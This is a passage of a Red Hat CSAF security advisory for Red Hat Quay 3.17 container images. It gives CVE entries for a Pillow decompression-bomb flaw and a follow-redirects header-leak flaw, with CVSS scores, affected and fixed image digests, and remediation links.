            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing"
    },
    {
      "cve": "CVE-2026-40895",
      "cwe": {
        "id": "CWE-212",
        "name": "Improper Removal of Sensitive Information Before Storage or Transfer"
      },
      "discovery_date": "2026-04-21T21:02:33.280553+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2460297"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in follow-redirects. When an HTTP request follows a cross-domain redirect (a redirection to a different domain), custom authentication headers, such as X-API-Key or X-Auth-Token, are not properly stripped. This allows these sensitive headers to be forwarded verbatim to the redirect target, potentially leading to the unintended disclosure of authentication information to an untrusted third party.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "follow-redirects: follow-redirects: Information disclosure via cross-domain redirects",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "RHBZ#2460297",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460297"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-40895",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40895",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653",
          "url": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653"
        }
      ],
      "release_date": "2026-04-21T19:59:59.759000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "follow-redirects: follow-redirects: Information disclosure via cross-domain redirects"
    },
    {
      "cve": "CVE-2026-42033",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T18:01:20.937507+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
